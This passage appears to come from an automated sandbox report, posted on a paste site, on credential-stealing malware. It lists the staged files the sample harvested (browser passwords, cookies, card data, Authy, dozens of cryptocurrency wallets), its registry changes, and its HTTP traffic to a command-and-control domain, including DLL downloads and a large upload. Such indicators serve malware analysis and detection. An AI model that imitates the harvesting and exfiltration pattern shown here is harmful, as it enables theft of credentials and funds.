  708. "C:\\Windows\\sysnative\\LogFiles\\Scm\\afaf612d-660b-4f6e-8276-b884fb688f59",
  709. "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2PROVIDERSUBSYSTEM",
  710. "\\??\\PIPE\\lsarpc",
  711. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERF321.tmp.appcompat.txt",
  712. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERFD73.tmp.WERInternalMetadata.xml",
  713. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERFDE1.tmp.hdmp",
  714. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WER5B2.tmp.mdmp",
  715. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_b19f4f5bbeb7afe56774ad38b4a248c71dfb_cab_05418602\\WERF321.tmp.appcompat.txt",
  716. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_b19f4f5bbeb7afe56774ad38b4a248c71dfb_cab_05418602\\WERFD73.tmp.WERInternalMetadata.xml",
  717. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_b19f4f5bbeb7afe56774ad38b4a248c71dfb_cab_05418602\\WERFDE1.tmp.hdmp",
  718. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_b19f4f5bbeb7afe56774ad38b4a248c71dfb_cab_05418602\\WER5B2.tmp.mdmp",
  719. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_b19f4f5bbeb7afe56774ad38b4a248c71dfb_cab_05418602\\Report.wer",
  720. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_b19f4f5bbeb7afe56774ad38b4a248c71dfb_cab_05418602\\Report.wer.tmp"
  721.  
  722.  
  723. * Deleted Files:
  724. "C:\\ProgramData\\freebl3.dll",
  725. "C:\\ProgramData\\mozglue.dll",
  726. "C:\\ProgramData\\msvcp140.dll",
  727. "C:\\ProgramData\\nss3.dll",
  728. "C:\\ProgramData\\softokn3.dll",
  729. "C:\\ProgramData\\vcruntime140.dll",
  730. "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Autofill\\Google Chrome_Default.txt",
  731. "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Autofill",
  732. "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\CC\\Google Chrome_Default.txt",
  733. "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\CC",
  734. "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Cookies\\Edge_Cookies.txt",
  735. "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Cookies\\Google Chrome_Default.txt",
  736. "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Cookies\\IE_Cookies.txt",
  737. "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Cookies",
  738. "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\cookie_list.txt",
  739. "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Downloads\\Google Chrome_Default.txt",
  740. "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Downloads",
  741. "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Files\\g1.zip",
  742. "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Files\\g2.zip",
  743. "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Files\\g3.zip",
  744. "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Files",
  745. "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\History\\Google Chrome_Default.txt",
  746. "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\History",
  747. "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\information.txt",
  748. "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\outlook.txt",
  749. "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\passwords.txt",
  750. "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\screenshot.jpg",
  751. "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Soft\\Authy",
  752. "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Soft",
  753. "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Wallets\\Anoncoin",
  754. "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Wallets\\BBQCoin",
  755. "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Wallets\\Bitcoin",
  756. "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Wallets\\DashCore",
  757. "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Wallets\\DevCoin",
  758. "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Wallets\\DigitalCoin",
  759. "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Wallets\\ElectronCash",
  760. "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Wallets\\Electrum",
  761. "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Wallets\\ElectrumLTC",
  762. "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Wallets\\Ethereum",
  763. "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Wallets\\Exodus",
  764. "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Wallets\\FlorinCoin",
  765. "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Wallets\\Franko",
  766. "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Wallets\\FreiCoin",
  767. "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Wallets\\GoldCoinGLD",
  768. "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Wallets\\InfiniteCoin",
  769. "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Wallets\\IOCoin",
  770. "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Wallets\\IxCoin",
  771. "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Wallets\\JAXX",
  772. "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Wallets\\Litecoin",
  773. "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Wallets\\MegaCoin",
  774. "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Wallets\\MinCoin",
  775. "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Wallets\\MultiDoge",
  776. "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Wallets\\NameCoin",
  777. "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Wallets\\PrimeCoin",
  778. "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Wallets\\TerraCoin",
  779. "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Wallets\\YACoin",
  780. "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Wallets\\Zcash",
  781. "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\files\\Wallets",
  782. "C:\\ProgramData\\53JWS3FJ45AKBHN2GQDNZVVZ2\\US_00000000-0000-0000-0000-0000000000001629257814.zip",
  783. "C:\\Users\\user\\AppData\\Local\\Temp\\Exes_9599755fd02eca75ad8cc0033c9706f5.exe",
  784. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERF321.tmp",
  785. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERF321.tmp.appcompat.txt",
  786. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERFD73.tmp",
  787. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERFD73.tmp.WERInternalMetadata.xml",
  788. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERFDE1.tmp",
  789. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERFDE1.tmp.hdmp",
  790. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WER5B2.tmp",
  791. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WER5B2.tmp.mdmp",
  792. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_b19f4f5bbeb7afe56774ad38b4a248c71dfb_cab_05418602\\Report.wer.tmp"
  793.  
  794.  
  795. * Modified Registry Keys:
  796. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\Winmgmt\\Type",
  797. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\WerSvc\\Type",
  798. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\W32Time\\Type",
  799. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\W32Time\\TimeProviders\\NtpClient\\SpecialPollTimeRemaining",
  800. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Consent",
  801. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Consent\\DefaultConsent"
  802.  
  803.  
  804. * Deleted Registry Keys:
  805.  
  806. * DNS Communications:
  807.  
  808. "type": "A",
  809. "request": "urbanholidaylo.net",
  810. "answers":
  811.  
  812. "data": "205.185.123.59",
  813. "type": "A"
  814.  
  815.  
  816.  
  817.  
  818. "type": "A",
  819. "request": "ip-api.com",
  820. "answers":
  821.  
  822. "data": "72.11.140.50",
  823. "type": "A"
  824.  
  825.  
  826. "data": "66.212.29.250",
  827. "type": "A"
  828.  
  829.  
  830.  
  831.  
  832.  
  833. * Domains:
  834.  
  835. "ip": "205.185.123.59",
  836. "domain": "urbanholidaylo.net"
  837.  
  838.  
  839. "ip": "66.212.29.250",
  840. "domain": "ip-api.com"
  841.  
  842.  
  843.  
  844. * Network Communication - ICMP:
  845.  
  846. * Network Communication - HTTP:
  847.  
  848. "count": 1,
  849. "body": "--1BEF0A57BE110FD467A--\r\n",
  850. "uri": "http://urbanholidaylo.net/482",
  851. "user-agent": "",
  852. "method": "POST",
  853. "host": "urbanholidaylo.net",
  854. "version": "1.1",
  855. "path": "/482",
  856. "data": "POST /482 HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nContent-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A\r\nContent-Length: 25\r\nHost: urbanholidaylo.net\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n--1BEF0A57BE110FD467A--\r\n",
  857. "port": 80
  858.  
  859.  
  860. "count": 1,
  861. "body": "",
  862. "uri": "http://urbanholidaylo.net/freebl3.dll",
  863. "user-agent": "",
  864. "method": "GET",
  865. "host": "urbanholidaylo.net",
  866. "version": "1.1",
  867. "path": "/freebl3.dll",
  868. "data": "GET /freebl3.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: urbanholidaylo.net\r\nConnection: Keep-Alive\r\n\r\n",
  869. "port": 80
  870.  
  871.  
  872. "count": 1,
  873. "body": "",
  874. "uri": "http://urbanholidaylo.net/mozglue.dll",
  875. "user-agent": "",
  876. "method": "GET",
  877. "host": "urbanholidaylo.net",
  878. "version": "1.1",
  879. "path": "/mozglue.dll",
  880. "data": "GET /mozglue.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: urbanholidaylo.net\r\nConnection: Keep-Alive\r\n\r\n",
  881. "port": 80
  882.  
  883.  
  884. "count": 1,
  885. "body": "",
  886. "uri": "http://urbanholidaylo.net/msvcp140.dll",
  887. "user-agent": "",
  888. "method": "GET",
  889. "host": "urbanholidaylo.net",
  890. "version": "1.1",
  891. "path": "/msvcp140.dll",
  892. "data": "GET /msvcp140.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: urbanholidaylo.net\r\nConnection: Keep-Alive\r\n\r\n",
  893. "port": 80
  894.  
  895.  
  896. "count": 1,
  897. "body": "",
  898. "uri": "http://urbanholidaylo.net/nss3.dll",
  899. "user-agent": "",
  900. "method": "GET",
  901. "host": "urbanholidaylo.net",
  902. "version": "1.1",
  903. "path": "/nss3.dll",
  904. "data": "GET /nss3.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: urbanholidaylo.net\r\nConnection: Keep-Alive\r\n\r\n",
  905. "port": 80
  906.  
  907.  
  908. "count": 1,
  909. "body": "",
  910. "uri": "http://urbanholidaylo.net/softokn3.dll",
  911. "user-agent": "",
  912. "method": "GET",
  913. "host": "urbanholidaylo.net",
  914. "version": "1.1",
  915. "path": "/softokn3.dll",
  916. "data": "GET /softokn3.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: urbanholidaylo.net\r\nConnection: Keep-Alive\r\n\r\n",
  917. "port": 80
  918.  
  919.  
  920. "count": 1,
  921. "body": "",
  922. "uri": "http://urbanholidaylo.net/vcruntime140.dll",
  923. "user-agent": "",
  924. "method": "GET",
  925. "host": "urbanholidaylo.net",
  926. "version": "1.1",
  927. "path": "/vcruntime140.dll",
  928. "data": "GET /vcruntime140.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: urbanholidaylo.net\r\nConnection: Keep-Alive\r\n\r\n",
  929. "port": 80
  930.  
  931.  
  932. "count": 1,
  933. "body": "--1BEF0A57BE110FD467A--\r\n",
  934. "uri": "http://ip-api.com/line/",
  935. "user-agent": "",
  936. "method": "POST",
  937. "host": "ip-api.com",
  938. "version": "1.1",
  939. "path": "/line/",
  940. "data": "POST /line/ HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nContent-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A\r\nContent-Length: 25\r\nHost: ip-api.com\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n--1BEF0A57BE110FD467A--\r\n",
  941. "port": 80
  942.  
  943.  
  944. "count": 1,
  945. "body": "",
  946. "uri": "http://urbanholidaylo.net/",
  947. "user-agent": "",
  948. "method": "POST",
  949. "host": "urbanholidaylo.net",
  950. "version": "1.1",
  951. "path": "/",
  952. "data": "POST / HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nContent-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A\r\nContent-Length: 41032\r\nHost: urbanholidaylo.net\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n",
  953. "port": 80
  954.  
  955.  
  956.  
  957. * Network Communication - SMTP:
  958.  
  959. * Network Communication - Hosts:
  960.  
  961. * Network Communication - IRC:
Advertisement
Add Comment
Please, Sign In to add comment